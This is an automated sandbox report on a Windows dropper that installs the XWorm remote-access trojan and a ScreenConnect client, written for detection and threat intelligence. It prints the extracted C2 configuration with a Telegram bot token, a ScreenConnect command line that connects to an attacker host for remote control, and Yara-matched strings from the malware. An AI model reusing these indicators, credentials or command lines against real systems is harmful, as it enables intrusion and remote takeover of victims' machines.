Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe
Analysis ID:	1663991
MD5:	22ebc0313c30af0f2610460f763b56b6
SHA1:	e15d6856887f7be6b75212d4af4f7e2d14298fa5
SHA256:	de01202c6aac1f0e971e018ef0f592f440f0dd0a62a955f514d27cdf63e5edcd
Tags:	exeuser-SecuriteInfoCom
Infos:

Detection

ScreenConnect Tool, XWorm

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Telegram RAT

Yara detected Telegram Recon

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

C2 URLs / IPs found in malware configuration

Changes security center settings (notifications, updates, antivirus, firewall)

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to hide user accounts

Creates files in the system32 config directory

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Enables network access during safeboot for specific services

Joe Sandbox ML detected suspicious sample

Modifies security policies related information

Possible COM Object hijacking

Reads the Security eventlog

Reads the System eventlog

Sample uses string decryption to hide its real strings

Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for available system drives (often done to infect USB drives)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates or modifies windows services

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

May use bcdedit to modify the Windows boot settings

Modifies existing windows services

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected ScreenConnect Tool

Yara signature match

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe (PID: 7064 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe" MD5: 22EBC0313C30AF0F2610460F763B56B6)

XClient.exe (PID: 6468 cmdline: "C:\Users\user\AppData\Roaming\XClient.exe" MD5: D8FE231C408F6F0D75D4D77FC07EA43A)

WerFault.exe (PID: 7180 cmdline: C:\Windows\system32\WerFault.exe -u -p 6468 -s 1660 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

msiexec.exe (PID: 5716 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\ex.msi" MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 4040 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 4072 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding B83268768F730349AA78A07AA19DE1CB C MD5: 9D09DC1EDA745A5F87553048E57620CF)

rundll32.exe (PID: 7032 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI41FF.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5128828 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)

msiexec.exe (PID: 5460 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding D3F98F32885A6934CA959398DEA944C7 MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 6612 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 44FEF3726CF7825BD3EF7883E408F966 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)

ScreenConnect.ClientService.exe (PID: 3640 cmdline: "C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=mail.cloudhelpdesk.cloud&p=8041&s=cb6ea22b-45f3-4c61-aa46-9cc50773bf5a&k=BgIAAACkAABSU0ExAAgAAAEAAQDdnHauHg9AaqneAd41l5C3tLCoGT7WUxJecmODN7O3GDl7BK4OnznyrIEVt6ejqJMy0i72fOUbua3Sro67lzXQSv7JFpGDGjNGLtH6df16cg3uQgIklYYL5A5i9K7p1tIb2s0RhiLUXpx2WtkQ8UI0x1ArjnFKgdtb3Cz5m3g7VQKiw1q%2f3qX4c1o5ag%2ffIId2sXvAAShYtBQd%2fxIikb9i8RFtwmlUlraBV5wEj55Xklm%2ftTdu5vYTJVWaPN9vNHfqooUbjj6q7DLjfJLpyKLjOUdyv6nlReN8sdhapR%2fbzVm1m086KSyD3TXkWAHjGA%2fsttqVUVVjalUa63JAH6j4&c=XOWRM&c=XOWRM&c=XOWRM&c=XOWRM&c=&c=&c=&c=" MD5: 75B21D04C69128A7230A0998086B61AA)

ScreenConnect.WindowsClient.exe (PID: 7280 cmdline: "C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe" "RunRole" "da688179-c868-42aa-9dc4-8a578037eae5" "User" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)

ScreenConnect.WindowsClient.exe (PID: 7560 cmdline: "C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe" "RunRole" "ee6c8909-d1a4-483d-8312-a72e084df991" "System" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)

svchost.exe (PID: 7064 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 5264 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 1140 cmdline: C:\Windows\system32\WerFault.exe -pss -s 468 -p 6468 -ip 6468 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

svchost.exe (PID: 6632 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

SgrmBroker.exe (PID: 7232 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)

svchost.exe (PID: 7348 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 7484 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 7716 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

MpCmdRun.exe (PID: 8180 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)

conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://cyber.wtf/2025/02/12/unpacking-pyarmor-v8-scripts/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["127.0.0.1", "beshomandotestbesnd.run.place"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "8195094601:AAH2whPA12KCVavUVhUNFLyB_HxLq2wTgM8", "Telegram Chatid": "7168737724", "Version": "XWorm V5.6"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Config.Msi\4e450d.rbs	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Users\user\AppData\Roaming\XClient.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
C:\Users\user\AppData\Roaming\XClient.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\Users\user\AppData\Roaming\XClient.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\Users\user\AppData\Roaming\XClient.exe	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0xdf12:$str01: $VB$Local_Port 0xdf3f:$str02: $VB$Local_Host 0xc239:$str03: get_Jpeg 0xc747:$str04: get_ServicePack 0xfb11:$str05: Select * from AntivirusProduct 0x10349:$str06: PCRestart 0x1035d:$str07: shutdown.exe /f /r /t 0 0x1040f:$str08: StopReport 0x103e5:$str09: StopDDos 0x104db:$str10: sendPlugin 0x1065b:$str12: -ExecutionPolicy Bypass -File " 0x10ebf:$str13: Content-length: 5235
C:\Users\user\AppData\Roaming\XClient.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xf561:$s6: VirtualBox 0xf4bf:$s8: Win32_ComputerSystem 0x123f6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x12493:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x125a8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x10dda:$cnc4: POST / HTTP/1.1
C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Installer\MSI473E.tmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Click to see the 3 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000010.00000000.1290146528.0000000000D72000.00000002.00000001.01000000.00000013.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
00000002.00000002.1335713833.0000000002C8C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x22f39:$s6: VirtualBox 0x37179:$s6: VirtualBox 0x22e97:$s8: Win32_ComputerSystem 0x370d7:$s8: Win32_ComputerSystem 0x25dce:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x3a00e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x25e6b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x3a0ab:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x25f80:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x3a1c0:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x247b2:$cnc4: POST / HTTP/1.1 0x389f2:$cnc4: POST / HTTP/1.1
00000002.00000000.1232990166.0000000000A62000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000002.00000000.1232990166.0000000000A62000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000000.1232990166.0000000000A62000.00000002.00000001.01000000.00000006.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xf361:$s6: VirtualBox 0xf2bf:$s8: Win32_ComputerSystem 0x121f6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x12293:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x123a8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x10bda:$cnc4: POST / HTTP/1.1
00000010.00000002.2476011004.0000000003171000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
00000013.00000002.1340922647.0000000002761000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Process Memory Space: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe PID: 7064	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe PID: 7064	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: XClient.exe PID: 6468	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: XClient.exe PID: 6468	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: rundll32.exe PID: 7032	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7280	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7560	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Click to see the 12 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0xc112:$str01: $VB$Local_Port 0xc13f:$str02: $VB$Local_Host 0xa439:$str03: get_Jpeg 0xa947:$str04: get_ServicePack 0xdd11:$str05: Select * from AntivirusProduct 0xe549:$str06: PCRestart 0xe55d:$str07: shutdown.exe /f /r /t 0 0xe60f:$str08: StopReport 0xe5e5:$str09: StopDDos 0xe6db:$str10: sendPlugin 0xe85b:$str12: -ExecutionPolicy Bypass -File " 0xf0bf:$str13: Content-length: 5235
0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xd761:$s6: VirtualBox 0xd6bf:$s8: Win32_ComputerSystem 0x105f6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x10693:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x107a8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xefda:$cnc4: POST / HTTP/1.1
16.2.ScreenConnect.WindowsClient.exe.31efa18.0.raw.unpack	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0xc112:$str01: $VB$Local_Port 0xc13f:$str02: $VB$Local_Host 0xa439:$str03: get_Jpeg 0xa947:$str04: get_ServicePack 0xdd11:$str05: Select * from AntivirusProduct 0xe549:$str06: PCRestart 0xe55d:$str07: shutdown.exe /f /r /t 0 0xe60f:$str08: StopReport 0xe5e5:$str09: StopDDos 0xe6db:$str10: sendPlugin 0xe85b:$str12: -ExecutionPolicy Bypass -File " 0xf0bf:$str13: Content-length: 5235
0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xd761:$s6: VirtualBox 0xd6bf:$s8: Win32_ComputerSystem 0x105f6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x10693:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x107a8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xefda:$cnc4: POST / HTTP/1.1
0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0xdf12:$str01: $VB$Local_Port 0xdf3f:$str02: $VB$Local_Host 0xc239:$str03: get_Jpeg 0xc747:$str04: get_ServicePack 0xfb11:$str05: Select * from AntivirusProduct 0x10349:$str06: PCRestart 0x1035d:$str07: shutdown.exe /f /r /t 0 0x1040f:$str08: StopReport 0x103e5:$str09: StopDDos 0x104db:$str10: sendPlugin 0x1065b:$str12: -ExecutionPolicy Bypass -File " 0x10ebf:$str13: Content-length: 5235
0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xf561:$s6: VirtualBox 0xf4bf:$s8: Win32_ComputerSystem 0x123f6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x12493:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x125a8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x10dda:$cnc4: POST / HTTP/1.1
0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0xdf12:$str01: $VB$Local_Port 0x22152:$str01: $VB$Local_Port 0xdf3f:$str02: $VB$Local_Host 0x2217f:$str02: $VB$Local_Host 0xc239:$str03: get_Jpeg 0x20479:$str03: get_Jpeg 0xc747:$str04: get_ServicePack 0x20987:$str04: get_ServicePack 0xfb11:$str05: Select * from AntivirusProduct 0x23d51:$str05: Select * from AntivirusProduct 0x10349:$str06: PCRestart 0x24589:$str06: PCRestart 0x1035d:$str07: shutdown.exe /f /r /t 0 0x2459d:$str07: shutdown.exe /f /r /t 0 0x1040f:$str08: StopReport 0x2464f:$str08: StopReport 0x103e5:$str09: StopDDos 0x24625:$str09: StopDDos 0x104db:$str10: sendPlugin 0x2471b:$str10: sendPlugin 0x1065b:$str12: -ExecutionPolicy Bypass -File "
0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xf561:$s6: VirtualBox 0x237a1:$s6: VirtualBox 0xf4bf:$s8: Win32_ComputerSystem 0x236ff:$s8: Win32_ComputerSystem 0x123f6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x26636:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x12493:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x266d3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x125a8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x267e8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x10dda:$cnc4: POST / HTTP/1.1 0x2501a:$cnc4: POST / HTTP/1.1
2.0.XClient.exe.a60000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
2.0.XClient.exe.a60000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.0.XClient.exe.a60000.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0xdf12:$str01: $VB$Local_Port 0xdf3f:$str02: $VB$Local_Host 0xc239:$str03: get_Jpeg 0xc747:$str04: get_ServicePack 0xfb11:$str05: Select * from AntivirusProduct 0x10349:$str06: PCRestart 0x1035d:$str07: shutdown.exe /f /r /t 0 0x1040f:$str08: StopReport 0x103e5:$str09: StopDDos 0x104db:$str10: sendPlugin 0x1065b:$str12: -ExecutionPolicy Bypass -File " 0x10ebf:$str13: Content-length: 5235
2.0.XClient.exe.a60000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xf561:$s6: VirtualBox 0xf4bf:$s8: Win32_ComputerSystem 0x123f6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x12493:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x125a8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x10dda:$cnc4: POST / HTTP/1.1
16.0.ScreenConnect.WindowsClient.exe.d70000.0.unpack	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
19.2.ScreenConnect.WindowsClient.exe.27dfa50.2.raw.unpack	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Click to see the 18 entries

Sigma Signatures

System Summary

Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=mail.cloudhelpdesk.cloud&p=8041&s=cb6ea22b-45f3-4c61-aa46-9cc50773bf5a&k=BgIAAACkAABSU0ExAAgAAAEAAQDdnHauHg9AaqneAd41l5C3tLCoGT7WUxJecmODN7O3GDl7BK4OnznyrIEVt6ejqJMy0i72fOUbua3Sro67lzXQSv7JFpGDGjNGLtH6df16cg3uQgIklYYL5A5i9K7p1tIb2s0RhiLUXpx2WtkQ8UI0x1ArjnFKgdtb3Cz5m3g7VQKiw1q%2f3qX4c1o5ag%2ffIId2sXvAAShYtBQd%2fxIikb9i8RFtwmlUlraBV5wEj55Xklm%2ftTdu5vYTJVWaPN9vNHfqooUbjj6q7DLjfJLpyKLjOUdyv6nlReN8sdhapR%2fbzVm1m086KSyD3TXkWAHjGA%2fsttqVUVVjalUa63JAH6j4&c=XOWRM&c=XOWRM&c=XOWRM&c=XOWRM&c=&c=&c=&c=", CommandLine: "C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=mail.cloudhelpdesk.cloud&p=8041&s=cb6ea22b-45f3-4c61-aa46-9cc50773bf5a&k=BgIAAACkAABSU0ExAAgAAAEAAQDdnHauHg9AaqneAd41l5C3tLCoGT7WUxJecmODN7O3GDl7BK4OnznyrIEVt6ejqJMy0i72fOUbua3Sro67lzXQSv7JFpGDGjNGLtH6df16cg3uQgIklYYL5A5i9K7p1tIb2s0RhiLUXpx2WtkQ8UI0x1ArjnFKgdtb3Cz5m3g7VQKiw1q%2f3qX4c1o5ag%2ffIId2sXvAAShYtBQd%2fxIikb9i8RFtwmlUlraBV5wEj55Xklm%2ftTdu5vYTJVWaPN9vNHfqooUbjj6q7DLjfJLpyKLjOUdyv6nlReN8sdhapR%2fbzVm1m086KSyD3TXkWAHjGA%2fsttqVUVVjalUa63JAH6j4&c=XOWRM&c=XOWRM&c=XOWRM&c=XOWRM&c=&c=&c=&c=", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe, NewProcessName: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe, OriginalFileName: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: "C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe" 